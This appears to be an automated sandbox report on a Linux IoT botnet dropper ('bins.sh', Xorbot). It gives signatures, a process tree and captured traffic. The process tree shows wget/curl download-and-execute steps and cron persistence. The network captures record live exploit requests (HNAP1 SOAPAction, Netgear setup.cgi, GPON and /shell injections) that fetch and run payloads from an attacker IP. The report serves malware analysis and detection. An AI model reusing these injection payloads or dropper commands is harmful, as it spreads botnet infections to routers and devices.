Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240729-en
  • resource tags

    arch:armhf
    image:debian9-armhf-20240729-en
    kernel:4.9.0-13-armmp-lpae
    locale:en-us
    os:debian-9-armhf
    system
  • submitted
    28/02/2025, 19:33 UTC

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    0d6abf13920f9568901114a1d17cdfd6

  • SHA1

    8f51702b2844fafb5952fa36d21c2b47de532b5f

  • SHA256

    7c0a391f5ce85b25149f47e7cdce3f47658ea8439a5d487d05833573f20ff9cb

  • SHA512

    0e8c146bd5d415028be102875ebb16d2b898f3923252b11cfeb179fd58a8ef36a54772709f514d6297449e8fdb4246740084f9ed93dad9bdd675905cdf67b795

  • SSDEEP

    192:RdZtmvfC3A3k3x3+3e3LjHkJpgL5d5l5uFpY90cva22sYaGiQa3vvLCLuLzm+v0q:RdZtmvfC3A3k3x3+3e3LjHkJpgLHzJ9p

Malware Config

Signatures

  • Detects Xorbot 5 IoCs
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

  • Xorbot family
  • Contacts a large number (1748) of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 5 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 5 IoCs
  • Renames itself 1 IoCs
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system.

  • Checks CPU configuration 1 TTPs 5 IoCs

    Checks CPU information, which indicates whether the system is a virtual machine.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 18 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 12 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
    • Executes dropped EXE
    PID:647
    • /bin/rm
      /bin/rm bins.sh
      2⤵
      PID:649
    • /usr/bin/wget
      wget http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:651
    • /usr/bin/curl
      curl -O http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
      2⤵
      • Checks CPU configuration
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:667
    • /bin/busybox
      /bin/busybox wget http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:677
    • /bin/chmod
      chmod 777 tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
      2⤵
      • File and Directory Permissions Modification
      PID:679
    • /tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
      ./tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
      2⤵
      PID:680
    • /bin/rm
      rm tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
      2⤵
      PID:682
    • /usr/bin/wget
      wget http://conn.masjesu.zip/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:683
    • /usr/bin/curl
      curl -O http://conn.masjesu.zip/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
      2⤵
      • Checks CPU configuration
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:684
    • /bin/busybox
      /bin/busybox wget http://conn.masjesu.zip/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
      2⤵
      • System Network Configuration Discovery
      PID:697
    • /bin/chmod
      chmod 777 59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
      2⤵
      • File and Directory Permissions Modification
      PID:734
    • /tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
      ./59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
      2⤵
      PID:735
    • /bin/rm
      rm 59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
      2⤵
      PID:737
    • /usr/bin/wget
      wget http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:738
    • /usr/bin/curl
      curl -O http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:739
    • /bin/busybox
      /bin/busybox wget http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:771
    • /bin/chmod
      chmod 777 l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
      2⤵
      • File and Directory Permissions Modification
      PID:772
    • /tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
      ./l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
      2⤵
      PID:773
    • /bin/rm
      rm l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
      2⤵
      PID:775
    • /usr/bin/wget
      wget http://conn.masjesu.zip/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:776
    • /usr/bin/curl
      curl -O http://conn.masjesu.zip/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
      2⤵
      • Checks CPU configuration
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:777
    • /bin/busybox
      /bin/busybox wget http://conn.masjesu.zip/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
      2⤵
      • System Network Configuration Discovery
      PID:779
    • /bin/chmod
      chmod 777 1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
      2⤵
      • File and Directory Permissions Modification
      PID:780
    • /tmp/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
      ./1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
      2⤵
      PID:781
    • /bin/rm
      rm 1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
      2⤵
      PID:783
    • /usr/bin/wget
      wget http://conn.masjesu.zip/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:784
    • /usr/bin/curl
      curl -O http://conn.masjesu.zip/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
      2⤵
      • Checks CPU configuration
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:787
    • /bin/busybox
      /bin/busybox wget http://conn.masjesu.zip/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
      2⤵
      • System Network Configuration Discovery
      PID:789
    • /bin/chmod
      chmod 777 z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
      2⤵
      • File and Directory Permissions Modification
      PID:790
    • /tmp/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
      ./z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
      2⤵
      • Renames itself
      • Reads runtime system information
      • System Network Configuration Discovery
      PID:791
      • /bin/sh
        sh -c "crontab -l"
        3⤵
        PID:793
        • /usr/bin/crontab
          crontab -l
          4⤵
          PID:794
      • /bin/sh
        sh -c "crontab -"
        3⤵
        PID:795
        • /usr/bin/crontab
          crontab -
          4⤵
          • Creates/modifies Cron job
          PID:796
    • /bin/rm
      rm z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
      2⤵
      • System Network Configuration Discovery
      PID:798
    • /usr/bin/wget
      wget http://conn.masjesu.zip/bins/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX
      2⤵
      • System Network Configuration Discovery
      PID:801

                          Network

                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN AAAA
                            Response
                          • flag-fr
                            GET
                            http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
                            Remote address:
                            37.44.238.88:80
                            Request
                            GET /bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G HTTP/1.1
                            User-Agent: Wget/1.18 (linux-gnueabihf)
                            Accept: */*
                            Accept-Encoding: identity
                            Host: conn.masjesu.zip
                            Connection: Keep-Alive
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.22.1
                            Date: Fri, 28 Feb 2025 19:33:15 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 109733
                            Connection: keep-alive
                            Last-Modified: Fri, 28 Feb 2025 18:36:31 GMT
                            ETag: "67c2022f-1aca5"
                            X-Cache-Status: MISS
                            Accept-Ranges: bytes
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN AAAA
                            Response
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                          • flag-fr
                            GET
                            http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
                            Remote address:
                            37.44.238.88:80
                            Request
                            GET /bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G HTTP/1.1
                            Host: conn.masjesu.zip
                            User-Agent: curl/7.52.1
                            Accept: */*
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.22.1
                            Date: Fri, 28 Feb 2025 19:33:16 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 109733
                            Connection: keep-alive
                            Last-Modified: Fri, 28 Feb 2025 18:36:31 GMT
                            ETag: "67c2022f-1aca5"
                            X-Cache-Status: HIT
                            Accept-Ranges: bytes
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN AAAA
                            Response
                          • flag-fr
                            GET
                            http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
                            Remote address:
                            37.44.238.88:80
                            Request
                            GET /bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G HTTP/1.1
                            Host: conn.masjesu.zip
                            User-Agent: Wget
                            Connection: close
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.22.1
                            Date: Fri, 28 Feb 2025 19:33:16 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 109733
                            Connection: close
                            Last-Modified: Fri, 28 Feb 2025 18:36:31 GMT
                            ETag: "67c2022f-1aca5"
                            X-Cache-Status: HIT
                            Accept-Ranges: bytes
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN AAAA
                            Response
                          • flag-fr
                            GET
                            http://conn.masjesu.zip/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
                            Remote address:
                            37.44.238.88:80
                            Request
                            GET /bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv HTTP/1.1
                            User-Agent: Wget/1.18 (linux-gnueabihf)
                            Accept: */*
                            Accept-Encoding: identity
                            Host: conn.masjesu.zip
                            Connection: Keep-Alive
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.22.1
                            Date: Fri, 28 Feb 2025 19:33:17 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 120808
                            Connection: keep-alive
                            Last-Modified: Fri, 28 Feb 2025 18:36:32 GMT
                            ETag: "67c20230-1d7e8"
                            X-Cache-Status: MISS
                            Accept-Ranges: bytes
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN AAAA
                            Response
                          • flag-fr
                            GET
                            http://conn.masjesu.zip/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
                            Remote address:
                            37.44.238.88:80
                            Request
                            GET /bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv HTTP/1.1
                            Host: conn.masjesu.zip
                            User-Agent: curl/7.52.1
                            Accept: */*
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.22.1
                            Date: Fri, 28 Feb 2025 19:33:18 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 120808
                            Connection: keep-alive
                            Last-Modified: Fri, 28 Feb 2025 18:36:32 GMT
                            ETag: "67c20230-1d7e8"
                            X-Cache-Status: HIT
                            Accept-Ranges: bytes
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN AAAA
                            Response
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN AAAA
                            Response
                          • flag-fr
                            GET
                            http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
                            Remote address:
                            37.44.238.88:80
                            Request
                            GET /bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E HTTP/1.1
                            User-Agent: Wget/1.18 (linux-gnueabihf)
                            Accept: */*
                            Accept-Encoding: identity
                            Host: conn.masjesu.zip
                            Connection: Keep-Alive
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.22.1
                            Date: Fri, 28 Feb 2025 19:33:22 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 101654
                            Connection: keep-alive
                            Last-Modified: Fri, 28 Feb 2025 18:36:32 GMT
                            ETag: "67c20230-18d16"
                            X-Cache-Status: MISS
                            Accept-Ranges: bytes
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN AAAA
                            Response
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                          • flag-fr
                            GET
                            http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
                            Remote address:
                            37.44.238.88:80
                            Request
                            GET /bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E HTTP/1.1
                            Host: conn.masjesu.zip
                            User-Agent: curl/7.52.1
                            Accept: */*
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.22.1
                            Date: Fri, 28 Feb 2025 19:33:28 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 101654
                            Connection: keep-alive
                            Last-Modified: Fri, 28 Feb 2025 18:36:32 GMT
                            ETag: "67c20230-18d16"
                            X-Cache-Status: HIT
                            Accept-Ranges: bytes
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN AAAA
                            Response
                          • flag-fr
                            GET
                            http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
                            Remote address:
                            37.44.238.88:80
                            Request
                            GET /bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E HTTP/1.1
                            Host: conn.masjesu.zip
                            User-Agent: Wget
                            Connection: close
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.22.1
                            Date: Fri, 28 Feb 2025 19:33:28 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 101654
                            Connection: close
                            Last-Modified: Fri, 28 Feb 2025 18:36:32 GMT
                            ETag: "67c20230-18d16"
                            X-Cache-Status: HIT
                            Accept-Ranges: bytes
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN AAAA
                            Response
                          • flag-fr
                            GET
                            http://conn.masjesu.zip/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
                            Remote address:
                            37.44.238.88:80
                            Request
                            GET /bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki HTTP/1.1
                            User-Agent: Wget/1.18 (linux-gnueabihf)
                            Accept: */*
                            Accept-Encoding: identity
                            Host: conn.masjesu.zip
                            Connection: Keep-Alive
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.22.1
                            Date: Fri, 28 Feb 2025 19:33:29 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 114267
                            Connection: keep-alive
                            Last-Modified: Fri, 28 Feb 2025 18:36:33 GMT
                            ETag: "67c20231-1be5b"
                            X-Cache-Status: MISS
                            Accept-Ranges: bytes
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN AAAA
                            Response
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                          • flag-fr
                            GET
                            http://conn.masjesu.zip/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
                            Remote address:
                            37.44.238.88:80
                            Request
                            GET /bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki HTTP/1.1
                            Host: conn.masjesu.zip
                            User-Agent: curl/7.52.1
                            Accept: */*
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.22.1
                            Date: Fri, 28 Feb 2025 19:33:29 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 114267
                            Connection: keep-alive
                            Last-Modified: Fri, 28 Feb 2025 18:36:33 GMT
                            ETag: "67c20231-1be5b"
                            X-Cache-Status: HIT
                            Accept-Ranges: bytes
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                          • [AU] DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN AAAA
                            Response
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                          • [AU] DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                          • [AU] DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN AAAA
                            Response
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                          • [FR] GET
                            http://conn.masjesu.zip/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
                            Remote address:
                            37.44.238.88:80
                            Request
                            GET /bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr HTTP/1.1
                            User-Agent: Wget/1.18 (linux-gnueabihf)
                            Accept: */*
                            Accept-Encoding: identity
                            Host: conn.masjesu.zip
                            Connection: Keep-Alive
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.22.1
                            Date: Fri, 28 Feb 2025 19:33:34 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 144869
                            Connection: keep-alive
                            Last-Modified: Fri, 28 Feb 2025 18:36:34 GMT
                            ETag: "67c20232-235e5"
                            X-Cache-Status: MISS
                            Accept-Ranges: bytes
                          • [AU] DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                          • [AU] DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN AAAA
                            Response
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                          • [FR] GET
                            http://conn.masjesu.zip/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
                            Remote address:
                            37.44.238.88:80
                            Request
                            GET /bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr HTTP/1.1
                            Host: conn.masjesu.zip
                            User-Agent: curl/7.52.1
                            Accept: */*
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.22.1
                            Date: Fri, 28 Feb 2025 19:33:35 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 144869
                            Connection: keep-alive
                            Last-Modified: Fri, 28 Feb 2025 18:36:34 GMT
                            ETag: "67c20232-235e5"
                            X-Cache-Status: HIT
                            Accept-Ranges: bytes
                          • [AU] DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                          • [AU] DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN AAAA
                            Response
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                          • [AU] DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                          • [FR] GET
                            http://37.44.238.88/.shell
                            Remote address:
                            37.44.238.88:80
                            Request
                            GET /.shell HTTP/1.1
                            Host: 37.44.238.88
                            Connection: close
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.22.1
                            Date: Fri, 28 Feb 2025 19:33:42 GMT
                            Content-Type: text/plain; charset=utf-8
                            Content-Length: 208
                            Connection: close
                            server-timing: cfL4;desc="?proto=TCP&rtt=1888&min_rtt=1770&rtt_var=901&sent=3&recv=6&lost=0&retrans=0&sent_bytes=139&recv_bytes=571&delivery_rate=532352&cwnd=250&unsent_bytes=0&cid=2d0f9e4f6658bcf1&ts=49&x=0"
                          • [AU] DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                          • [AU] DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN AAAA
                            Response
                          • [US] GET
                            http://104.24.157.51:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
                            Remote address:
                            104.24.157.51:80
                            Request
                            GET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
                            User-Agent: masjesu
                            Host: 104.24.157.51:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive
                            Response
                            HTTP/1.1 403 Forbidden
                            Date: Fri, 28 Feb 2025 19:33:42 GMT
                            Content-Type: text/plain; charset=UTF-8
                            Content-Length: 16
                            Connection: close
                            X-Frame-Options: SAMEORIGIN
                            Referrer-Policy: same-origin
                            Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                            Server: cloudflare
                            CF-RAY: 9192d90e5b949415-LHR
                          • [US] POST
                            http://104.24.157.51:80/HNAP1/
                            Remote address:
                            104.24.157.51:80
                            Request
                            POST /HNAP1/ HTTP/1.0
                            Host: 104.24.157.51:80
                            Content-Type: text/xml; charset="utf-8"
                            SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
                            Content-Length: 640
                            Response
                            HTTP/1.1 403 Forbidden
                            Date: Fri, 28 Feb 2025 19:33:42 GMT
                            Content-Type: text/plain; charset=UTF-8
                            Content-Length: 16
                            Connection: close
                            X-Frame-Options: SAMEORIGIN
                            Referrer-Policy: same-origin
                            Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                            Server: cloudflare
                            CF-RAY: 9192d90e5e9c63c5-LHR
                          • [US] GET
                            http://104.24.157.51:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                            Remote address:
                            104.24.157.51:80
                            Request
                            GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Response
                            HTTP/1.1 400 Bad Request
                            Date: Fri, 28 Feb 2025 19:33:42 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            Server: cloudflare
                            CF-RAY: 9192d90e5b7b9547-LHR
                          • [US] POST
                            http://127.0.0.1:80/GponForm/diag_Form?images/
                            Remote address:
                            104.24.157.51:80
                            Request
                            POST /GponForm/diag_Form?images/ HTTP/1.1
                            Host: 127.0.0.1:80
                            Connection: keep-alive
                            Accept-Encoding: gzip, deflate
                            Accept: */*
                            User-Agent: masjesu
                            Content-Length: 118
                            Response
                            HTTP/1.1 403 Forbidden
                            Date: Fri, 28 Feb 2025 19:33:42 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Frame-Options: SAMEORIGIN
                            Referrer-Policy: same-origin
                            Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                            Vary: Accept-Encoding
                            Server: cloudflare
                            CF-RAY: 9192d90e6ca294ea-LHR
                            Content-Encoding: gzip
                          • [US] GET
                            http://104.24.157.51:8080/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                            Remote address:
                            104.24.157.51:8080
                            Request
                            GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Response
                            HTTP/1.1 400 Bad Request
                            Date: Fri, 28 Feb 2025 19:33:43 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            Server: cloudflare
                            CF-RAY: 9192d911d9bf8ae0-LHR
                          • [US] POST
                            http://127.0.0.1:8080/GponForm/diag_Form?images/
                            Remote address:
                            104.24.157.51:8080
                            Request
                            POST /GponForm/diag_Form?images/ HTTP/1.1
                            Host: 127.0.0.1:8080
                            Connection: keep-alive
                            Accept-Encoding: gzip, deflate
                            Accept: */*
                            User-Agent: masjesu
                            Content-Length: 118
                            Response
                            HTTP/1.1 403 Forbidden
